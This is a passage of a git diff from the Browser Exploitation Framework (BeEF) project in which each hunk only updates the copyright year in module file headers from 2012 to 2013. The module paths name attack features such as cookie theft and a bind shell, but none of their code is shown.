 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/browser/hooked_domain/replace_video/module.rb b/modules/browser/hooked_domain/replace_video/module.rb
index e5c63c9f1..ce9f895b6 100644
--- a/modules/browser/hooked_domain/replace_video/module.rb
+++ b/modules/browser/hooked_domain/replace_video/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/browser/hooked_domain/rickroll/command.js b/modules/browser/hooked_domain/rickroll/command.js
index 331b3ba8a..9671ead56 100644
--- a/modules/browser/hooked_domain/rickroll/command.js
+++ b/modules/browser/hooked_domain/rickroll/command.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/modules/browser/hooked_domain/rickroll/config.yaml b/modules/browser/hooked_domain/rickroll/config.yaml
index 9209a0685..e1efdb575 100644
--- a/modules/browser/hooked_domain/rickroll/config.yaml
+++ b/modules/browser/hooked_domain/rickroll/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/browser/hooked_domain/rickroll/module.rb b/modules/browser/hooked_domain/rickroll/module.rb
index 66c8fa76a..cd0e7eb6b 100644
--- a/modules/browser/hooked_domain/rickroll/module.rb
+++ b/modules/browser/hooked_domain/rickroll/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/browser/hooked_domain/site_redirect/command.js b/modules/browser/hooked_domain/site_redirect/command.js
index 27dcd8594..921d2f4c3 100644
--- a/modules/browser/hooked_domain/site_redirect/command.js
+++ b/modules/browser/hooked_domain/site_redirect/command.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/modules/browser/hooked_domain/site_redirect/config.yaml b/modules/browser/hooked_domain/site_redirect/config.yaml
index d1a020585..baa80ee31 100644
--- a/modules/browser/hooked_domain/site_redirect/config.yaml
+++ b/modules/browser/hooked_domain/site_redirect/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/browser/hooked_domain/site_redirect/module.rb b/modules/browser/hooked_domain/site_redirect/module.rb
index aa178b8df..a1c8a76fd 100644
--- a/modules/browser/hooked_domain/site_redirect/module.rb
+++ b/modules/browser/hooked_domain/site_redirect/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/browser/hooked_domain/site_redirect_iframe/command.js b/modules/browser/hooked_domain/site_redirect_iframe/command.js
index 153fa69a6..8913ba0bb 100644
--- a/modules/browser/hooked_domain/site_redirect_iframe/command.js
+++ b/modules/browser/hooked_domain/site_redirect_iframe/command.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/modules/browser/hooked_domain/site_redirect_iframe/config.yaml b/modules/browser/hooked_domain/site_redirect_iframe/config.yaml
index 1e4d1ac8a..f4ce2e54d 100644
--- a/modules/browser/hooked_domain/site_redirect_iframe/config.yaml
+++ b/modules/browser/hooked_domain/site_redirect_iframe/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/browser/hooked_domain/site_redirect_iframe/module.rb b/modules/browser/hooked_domain/site_redirect_iframe/module.rb
index 6d25c3aad..813dc802a 100644
--- a/modules/browser/hooked_domain/site_redirect_iframe/module.rb
+++ b/modules/browser/hooked_domain/site_redirect_iframe/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/browser/play_sound/command.js b/modules/browser/play_sound/command.js
index f674c6730..af3f76864 100644
--- a/modules/browser/play_sound/command.js
+++ b/modules/browser/play_sound/command.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/modules/browser/play_sound/config.yaml b/modules/browser/play_sound/config.yaml
index 46e15808a..a83b789ea 100644
--- a/modules/browser/play_sound/config.yaml
+++ b/modules/browser/play_sound/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/browser/play_sound/module.rb b/modules/browser/play_sound/module.rb
index 6de2fab29..9c4eb75a3 100644
--- a/modules/browser/play_sound/module.rb
+++ b/modules/browser/play_sound/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/browser/unhook/command.js b/modules/browser/unhook/command.js
index 1301e0254..2d47ff818 100644
--- a/modules/browser/unhook/command.js
+++ b/modules/browser/unhook/command.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/modules/browser/unhook/config.yaml b/modules/browser/unhook/config.yaml
index 47a88e326..ad150597c 100644
--- a/modules/browser/unhook/config.yaml
+++ b/modules/browser/unhook/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/browser/unhook/module.rb b/modules/browser/unhook/module.rb
index f711022c7..b3fdade0f 100644
--- a/modules/browser/unhook/module.rb
+++ b/modules/browser/unhook/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/browser/webcam/command.js b/modules/browser/webcam/command.js
index 48c2b77ff..a4f939a5d 100644
--- a/modules/browser/webcam/command.js
+++ b/modules/browser/webcam/command.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/modules/browser/webcam/config.yaml b/modules/browser/webcam/config.yaml
index 539e5751a..fac0f3544 100644
--- a/modules/browser/webcam/config.yaml
+++ b/modules/browser/webcam/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/browser/webcam/module.rb b/modules/browser/webcam/module.rb
index 0130d5b34..ee1ea45f9 100644
--- a/modules/browser/webcam/module.rb
+++ b/modules/browser/webcam/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/chrome_extensions/execute_tabs/command.js b/modules/chrome_extensions/execute_tabs/command.js
index 10219874c..cce9c2b44 100644
--- a/modules/chrome_extensions/execute_tabs/command.js
+++ b/modules/chrome_extensions/execute_tabs/command.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/modules/chrome_extensions/execute_tabs/config.yaml b/modules/chrome_extensions/execute_tabs/config.yaml
index f3c05c603..b180bb289 100644
--- a/modules/chrome_extensions/execute_tabs/config.yaml
+++ b/modules/chrome_extensions/execute_tabs/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/chrome_extensions/execute_tabs/module.rb b/modules/chrome_extensions/execute_tabs/module.rb
index 8e1e31cd1..737456752 100644
--- a/modules/chrome_extensions/execute_tabs/module.rb
+++ b/modules/chrome_extensions/execute_tabs/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/chrome_extensions/get_all_cookies/command.js b/modules/chrome_extensions/get_all_cookies/command.js
index d43ec533a..97c3cd5e2 100755
--- a/modules/chrome_extensions/get_all_cookies/command.js
+++ b/modules/chrome_extensions/get_all_cookies/command.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/modules/chrome_extensions/get_all_cookies/config.yaml b/modules/chrome_extensions/get_all_cookies/config.yaml
index 0b5d3cf7b..4d93f955d 100755
--- a/modules/chrome_extensions/get_all_cookies/config.yaml
+++ b/modules/chrome_extensions/get_all_cookies/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/chrome_extensions/get_all_cookies/module.rb b/modules/chrome_extensions/get_all_cookies/module.rb
index 37cac3263..174048768 100755
--- a/modules/chrome_extensions/get_all_cookies/module.rb
+++ b/modules/chrome_extensions/get_all_cookies/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/chrome_extensions/get_chrome_extensions/command.js b/modules/chrome_extensions/get_chrome_extensions/command.js
index d7f16b3ba..59f814324 100644
--- a/modules/chrome_extensions/get_chrome_extensions/command.js
+++ b/modules/chrome_extensions/get_chrome_extensions/command.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/modules/chrome_extensions/get_chrome_extensions/config.yaml b/modules/chrome_extensions/get_chrome_extensions/config.yaml
index 550a48a4a..d5519b296 100644
--- a/modules/chrome_extensions/get_chrome_extensions/config.yaml
+++ b/modules/chrome_extensions/get_chrome_extensions/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/chrome_extensions/get_chrome_extensions/module.rb b/modules/chrome_extensions/get_chrome_extensions/module.rb
index c3c027081..087646604 100644
--- a/modules/chrome_extensions/get_chrome_extensions/module.rb
+++ b/modules/chrome_extensions/get_chrome_extensions/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/chrome_extensions/grab_google_contacts/command.js b/modules/chrome_extensions/grab_google_contacts/command.js
index e19bfe46f..6fa297bce 100644
--- a/modules/chrome_extensions/grab_google_contacts/command.js
+++ b/modules/chrome_extensions/grab_google_contacts/command.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/modules/chrome_extensions/grab_google_contacts/config.yaml b/modules/chrome_extensions/grab_google_contacts/config.yaml
index 2ee430c3c..52db56f97 100644
--- a/modules/chrome_extensions/grab_google_contacts/config.yaml
+++ b/modules/chrome_extensions/grab_google_contacts/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/chrome_extensions/grab_google_contacts/module.rb b/modules/chrome_extensions/grab_google_contacts/module.rb
index a4f2b9022..7c8c8bb87 100644
--- a/modules/chrome_extensions/grab_google_contacts/module.rb
+++ b/modules/chrome_extensions/grab_google_contacts/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/chrome_extensions/inject_beef/command.js b/modules/chrome_extensions/inject_beef/command.js
index ec878845a..5243259e1 100755
--- a/modules/chrome_extensions/inject_beef/command.js
+++ b/modules/chrome_extensions/inject_beef/command.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/modules/chrome_extensions/inject_beef/config.yaml b/modules/chrome_extensions/inject_beef/config.yaml
index 92416d2dd..8455bba15 100755
--- a/modules/chrome_extensions/inject_beef/config.yaml
+++ b/modules/chrome_extensions/inject_beef/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/chrome_extensions/inject_beef/module.rb b/modules/chrome_extensions/inject_beef/module.rb
index 346daea70..a11aa10c8 100755
--- a/modules/chrome_extensions/inject_beef/module.rb
+++ b/modules/chrome_extensions/inject_beef/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/chrome_extensions/screenshot/command.js b/modules/chrome_extensions/screenshot/command.js
index bc5df119a..490609056 100755
--- a/modules/chrome_extensions/screenshot/command.js
+++ b/modules/chrome_extensions/screenshot/command.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/modules/chrome_extensions/screenshot/config.yaml b/modules/chrome_extensions/screenshot/config.yaml
index 3b293bd55..837f3b413 100755
--- a/modules/chrome_extensions/screenshot/config.yaml
+++ b/modules/chrome_extensions/screenshot/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/chrome_extensions/screenshot/module.rb b/modules/chrome_extensions/screenshot/module.rb
index 714290a43..0663bffbd 100755
--- a/modules/chrome_extensions/screenshot/module.rb
+++ b/modules/chrome_extensions/screenshot/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/chrome_extensions/send_gvoice_sms/command.js b/modules/chrome_extensions/send_gvoice_sms/command.js
index a2024ee12..6d8082fdd 100755
--- a/modules/chrome_extensions/send_gvoice_sms/command.js
+++ b/modules/chrome_extensions/send_gvoice_sms/command.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/modules/chrome_extensions/send_gvoice_sms/config.yaml b/modules/chrome_extensions/send_gvoice_sms/config.yaml
index 4253c482d..07e32b8e9 100755
--- a/modules/chrome_extensions/send_gvoice_sms/config.yaml
+++ b/modules/chrome_extensions/send_gvoice_sms/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/chrome_extensions/send_gvoice_sms/module.rb b/modules/chrome_extensions/send_gvoice_sms/module.rb
index 85950bc03..99eea8418 100755
--- a/modules/chrome_extensions/send_gvoice_sms/module.rb
+++ b/modules/chrome_extensions/send_gvoice_sms/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/debug/test_cors_request/command.js b/modules/debug/test_cors_request/command.js
index bfe5abc2d..8ef5044d9 100644
--- a/modules/debug/test_cors_request/command.js
+++ b/modules/debug/test_cors_request/command.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/modules/debug/test_cors_request/config.yaml b/modules/debug/test_cors_request/config.yaml
index 767060493..ec961b554 100644
--- a/modules/debug/test_cors_request/config.yaml
+++ b/modules/debug/test_cors_request/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/debug/test_cors_request/module.rb b/modules/debug/test_cors_request/module.rb
index 98bb97973..569963dfe 100644
--- a/modules/debug/test_cors_request/module.rb
+++ b/modules/debug/test_cors_request/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/debug/test_network_request/command.js b/modules/debug/test_network_request/command.js
index 97bca59b8..6bc4371b4 100644
--- a/modules/debug/test_network_request/command.js
+++ b/modules/debug/test_network_request/command.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/modules/debug/test_network_request/config.yaml b/modules/debug/test_network_request/config.yaml
index b8ba5904d..3d214575d 100644
--- a/modules/debug/test_network_request/config.yaml
+++ b/modules/debug/test_network_request/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/debug/test_network_request/module.rb b/modules/debug/test_network_request/module.rb
index bddfb3459..a464ab1f2 100644
--- a/modules/debug/test_network_request/module.rb
+++ b/modules/debug/test_network_request/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/debug/test_return_ascii_chars/command.js b/modules/debug/test_return_ascii_chars/command.js
index afdcea3d8..03d6d1e0b 100644
--- a/modules/debug/test_return_ascii_chars/command.js
+++ b/modules/debug/test_return_ascii_chars/command.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/modules/debug/test_return_ascii_chars/config.yaml b/modules/debug/test_return_ascii_chars/config.yaml
index 7d8c2f4f7..60f1b7afe 100644
--- a/modules/debug/test_return_ascii_chars/config.yaml
+++ b/modules/debug/test_return_ascii_chars/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/debug/test_return_ascii_chars/module.rb b/modules/debug/test_return_ascii_chars/module.rb
index ae81dbfba..c79a986d3 100644
--- a/modules/debug/test_return_ascii_chars/module.rb
+++ b/modules/debug/test_return_ascii_chars/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/debug/test_return_long_string/command.js b/modules/debug/test_return_long_string/command.js
index 656a48fd7..1c8f06889 100644
--- a/modules/debug/test_return_long_string/command.js
+++ b/modules/debug/test_return_long_string/command.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/modules/debug/test_return_long_string/config.yaml b/modules/debug/test_return_long_string/config.yaml
index 0bbafff83..6451db22a 100644
--- a/modules/debug/test_return_long_string/config.yaml
+++ b/modules/debug/test_return_long_string/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/debug/test_return_long_string/module.rb b/modules/debug/test_return_long_string/module.rb
index f637fc511..77f4b86dc 100644
--- a/modules/debug/test_return_long_string/module.rb
+++ b/modules/debug/test_return_long_string/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/exploits/axous_1_1_1_add_user_csrf/command.js b/modules/exploits/axous_1_1_1_add_user_csrf/command.js
index 6c4c84a03..21b66e983 100644
--- a/modules/exploits/axous_1_1_1_add_user_csrf/command.js
+++ b/modules/exploits/axous_1_1_1_add_user_csrf/command.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/modules/exploits/axous_1_1_1_add_user_csrf/config.yaml b/modules/exploits/axous_1_1_1_add_user_csrf/config.yaml
index 94f2d4549..7a15e558e 100644
--- a/modules/exploits/axous_1_1_1_add_user_csrf/config.yaml
+++ b/modules/exploits/axous_1_1_1_add_user_csrf/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/exploits/axous_1_1_1_add_user_csrf/module.rb b/modules/exploits/axous_1_1_1_add_user_csrf/module.rb
index 587af0530..ee3559091 100644
--- a/modules/exploits/axous_1_1_1_add_user_csrf/module.rb
+++ b/modules/exploits/axous_1_1_1_add_user_csrf/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/exploits/beefbind/beef_bind_shell/command.js b/modules/exploits/beefbind/beef_bind_shell/command.js
index f4a0fc902..dbd0df5ca 100755
--- a/modules/exploits/beefbind/beef_bind_shell/command.js
+++ b/modules/exploits/beefbind/beef_bind_shell/command.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/modules/exploits/beefbind/beef_bind_shell/config.yaml b/modules/exploits/beefbind/beef_bind_shell/config.yaml
index 2aa33ea98..e7de6238a 100755
--- a/modules/exploits/beefbind/beef_bind_shell/config.yaml
